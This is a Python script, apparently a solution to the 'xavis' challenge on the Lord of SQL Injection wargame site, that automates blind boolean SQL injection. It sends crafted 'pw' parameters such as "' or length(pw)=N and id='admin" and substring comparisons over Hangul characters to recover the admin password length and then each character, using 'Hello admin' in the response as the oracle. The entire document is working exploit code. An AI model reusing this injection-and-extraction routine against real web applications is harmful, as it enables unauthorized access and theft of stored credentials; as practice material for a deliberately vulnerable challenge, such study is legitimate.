import requests password = '' password_length = -1 URL = 'https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php' headers = {'Content-Type': 'application/json; charset=utf-8'} cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'} for estimated_length in range(1, 20): query = {'pw': "' or length(pw)={} and id='admin".format(estimated_length)} res=requests.get(URL, params=query, headers=headers, cookies=cookies) if "Hello admin" in res.text: password_length = int(estimated_length / 3) print("admin's password length is {}(mysql takes hangul for 3).".format(password_length)) break for current_password_length in range(1, password_length+1) : base_password_index = -1 base_password_limit = -1 hangul_strings = "가나다라마바사아자차카타파하" for index, password_chr in enumerate(hangul_strings): query={'pw': "' or substring(pw,{},1)<'{}' and id='admin".format(current_password_length, password_chr)} res=requests.get(URL, params=query, headers=headers, cookies=cookies) if "Hello admin" in res.text: base_password_index = index - 1 base_password_limit = index print("Looking for password between {} and {}".\ format(hangul_strings[base_password_index], hangul_strings[base_password_limit])) break if base_password_index < 0: print("Password character {} is not a word(before '가')".format(current_password_length)) break # bug when 'if base_password_index' and base_password_index is 0('가') if base_password_index >= 0: for password_ord in range(ord(hangul_strings[base_password_index]), ord(hangul_strings[base_password_limit])): query = {'pw': "' or substring(pw,{},1)='{}' and id='admin".format(current_password_length, chr(password_ord))} res = requests.get(URL, params=query, headers=headers, cookies=cookies) if "Hello admin" in res.text: password = password + chr(password_ord) print(password) break else: print("Password at {} not found.".format(current_password_length)) break if len(password) == password_length: print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))